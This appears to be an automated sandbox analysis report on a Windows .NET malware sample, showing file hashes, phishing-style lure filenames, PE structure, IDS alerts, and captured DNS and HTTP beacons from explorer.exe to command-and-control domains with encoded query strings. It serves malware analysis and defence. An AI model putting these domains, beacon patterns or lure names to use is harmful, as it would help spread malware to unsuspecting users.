                                                                    MD5:F2A47587431C466535F3C3D3427724BE
                                                                    SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                    SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                    SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: NewOrderPDF.exe, Detection: malicious, Browse
                                                                    • Filename: DHLExpress_Shipment101909.exe, Detection: malicious, Browse
                                                                    • Filename: Niki-Gmbh Germany Inquiry.exe, Detection: malicious, Browse
                                                                    • Filename: Enquiry MW886079 ( Flowstar.CO.UK ).exe, Detection: malicious, Browse
                                                                    • Filename: Order18102021.exe, Detection: malicious, Browse
                                                                    • Filename: DHL_Ship_152021.exe, Detection: malicious, Browse
                                                                    • Filename: DO854.exe, Detection: malicious, Browse
                                                                    • Filename: DrAlj265av.exe, Detection: malicious, Browse
                                                                    • Filename: masa_prot.exe, Detection: malicious, Browse
                                                                    • Filename: 75lT7DuXrs.exe, Detection: malicious, Browse
                                                                    • Filename: dark.exe, Detection: malicious, Browse
                                                                    • Filename: tortilla.exe, Detection: malicious, Browse
                                                                    • Filename: dark.exe, Detection: malicious, Browse
                                                                    • Filename: 2xYyRwsd4z.exe, Detection: malicious, Browse
                                                                    • Filename: bNaLNMv3po.exe, Detection: malicious, Browse
                                                                    • Filename: uUdLeF2vh0.exe, Detection: malicious, Browse
                                                                    • Filename: DHL_Express1102021.exe, Detection: malicious, Browse
                                                                    • Filename: VsRff7UbXL.exe, Detection: malicious, Browse
                                                                    • Filename: DHL_Shipment_20210621.exe, Detection: malicious, Browse
                                                                    • Filename: SH_07391564.exe, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):6.317958673363568
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:583475.exe
                                                                    File size:1085952
                                                                    MD5:721356bfa1f8c23d40f6b2ff77b55db0
                                                                    SHA1:c4d25b17c64716f2e7558bd302cd901bd63757d8
                                                                    SHA256:e876c1db90717ff0819f4fc578adace61decdad64963836ebc9ae983dc87a5d6
                                                                    SHA512:a424419a3083ddf2e29eea8a058a3002bc0d1cd3cbb20b6db698c90f715aa1ea1d55bc3933aaa5b7bf17d04ecd80227b1acdb7cff02c4d1177f6909766dfb8c1
                                                                    SSDEEP:12288:SscL0U9tCbBOsVTy701/hSGbBSFEuCXrmKsr3S5NTA7CJzmZjeRaoNv3/etzWl/L:SoitzsJenEuaSC5dAMqZjeRah0/eSU
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......(............................N.... ........@.. ....................................`................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x50a74e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                    Time Stamp:0x2817048D [Thu Apr 25 16:32:13 1991 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x10a6f40x57.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x10c0000x5c6.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x10e0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x1087540x108800False0.532818222767data6.32256294989IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x10c0000x5c60x600False0.418619791667data4.12085319226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x10e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_VERSION0x10c0a00x33cdata
                                                                    RT_MANIFEST0x10c3dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2018
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameDemoProject2.exe
                                                                    FileVersion1.0.0.0
                                                                    CompanyName
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductNameDemoProject2
                                                                    ProductVersion1.0.0.0
                                                                    FileDescriptionDemoProject2
                                                                    OriginalFilenameDemoProject2.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    10/27/21-16:30:57.115149TCP1201ATTACK-RESPONSES 403 Forbidden804983434.102.136.180192.168.2.4

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 27, 2021 16:29:02.140865088 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.140914917 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.141000032 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.183121920 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.183150053 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.235753059 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.235908031 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.240669966 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.240684986 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.240995884 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.284768105 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.631853104 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.676862001 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702317953 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702384949 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702425957 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702445030 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.702470064 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702507973 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702522993 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.702536106 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702584982 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.703332901 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704622984 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704665899 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704693079 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.704705954 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704761028 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.705944061 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707242012 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707284927 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707320929 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.707340956 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707403898 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.721030951 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721581936 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721647024 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721647024 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.721663952 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721718073 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.723046064 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724215031 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724261999 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724272966 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.724293947 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724348068 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.725517035 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726818085 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726862907 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726869106 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.726881981 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726922035 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.728116989 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729406118 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729450941 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729456902 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.729469061 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729518890 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.730592966 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731796980 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731847048 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731849909 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.731865883 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731910944 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.732968092 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734147072 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734198093 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734208107 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.734221935 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734267950 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.735337973 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.735460997 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.735510111 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:37.126528025 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:30:56.917968035 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.936786890 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:56.937079906 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.937561035 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.956696033 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115149021 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115207911 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115453959 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:57.115672112 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:57.134474039 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:31:02.178193092 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.345493078 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.345706940 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.345992088 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.513111115 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519042969 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519074917 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519308090 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.519490957 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.686786890 CEST804983568.66.224.28192.168.2.4

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 27, 2021 16:29:02.085024118 CEST4925753192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:29:02.104489088 CEST53492578.8.8.8192.168.2.4
                                                                    Oct 27, 2021 16:30:56.883162022 CEST6152253192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:30:56.907116890 CEST53615228.8.8.8192.168.2.4
                                                                    Oct 27, 2021 16:31:02.132074118 CEST5233753192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:31:02.176274061 CEST53523378.8.8.8192.168.2.4
                                                                    Oct 27, 2021 16:31:07.904279947 CEST5504653192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:31:07.928216934 CEST53550468.8.8.8192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Oct 27, 2021 16:29:02.085024118 CEST192.168.2.48.8.8.80xc423Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.883162022 CEST192.168.2.48.8.8.80x49ffStandard query (0)www.tinyhollywood.comA (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.132074118 CEST192.168.2.48.8.8.80x5817Standard query (0)www.appsdeals14.comA (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.904279947 CEST192.168.2.48.8.8.80xbe18Standard query (0)www.eeeptou.xyzA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Oct 27, 2021 16:29:02.104489088 CEST8.8.8.8192.168.2.40xc423No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.907116890 CEST8.8.8.8192.168.2.40x49ffNo error (0)www.tinyhollywood.comtinyhollywood.comCNAME (Canonical name)IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.907116890 CEST8.8.8.8192.168.2.40x49ffNo error (0)tinyhollywood.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.176274061 CEST8.8.8.8192.168.2.40x5817No error (0)www.appsdeals14.comappsdeals14.comCNAME (Canonical name)IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.176274061 CEST8.8.8.8192.168.2.40x5817No error (0)appsdeals14.com68.66.224.28A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.928216934 CEST8.8.8.8192.168.2.40xbe18No error (0)www.eeeptou.xyz104.21.96.92A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.928216934 CEST8.8.8.8192.168.2.40xbe18No error (0)www.eeeptou.xyz172.67.176.70A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.google.com
                                                                    • www.tinyhollywood.com
                                                                    • www.appsdeals14.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.449757142.250.185.228443C:\Users\user\Desktop\583475.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.44983434.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 27, 2021 16:30:56.937561035 CEST6158OUTGET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1
                                                                    Host: www.tinyhollywood.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 27, 2021 16:30:57.115149021 CEST6159INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 27 Oct 2021 14:30:57 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "61774856-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.44983568.66.224.2880C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 27, 2021 16:31:02.345992088 CEST6160OUTGET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1
                                                                    Host: www.appsdeals14.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 27, 2021 16:31:02.519042969 CEST6160INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 27 Oct 2021 14:31:02 GMT
                                                                    Server: Apache
                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.449757142.250.185.228443C:\Users\user\Desktop\583475.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-10-27 14:29:02 UTC0OUTGET / HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: Keep-Alive
                                                                    2021-10-27 14:29:02 UTC0INHTTP/1.1 200 OK
                                                                    Date: Wed, 27 Oct 2021 14:29:02 GMT
                                                                    Expires: -1
                                                                    Cache-Control: private, max-age=0
                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Server: gws
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: CONSENT=PENDING+040; expires=Fri, 27-Oct-2023 14:29:02 GMT; path=/; domain=.google.com; Secure
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
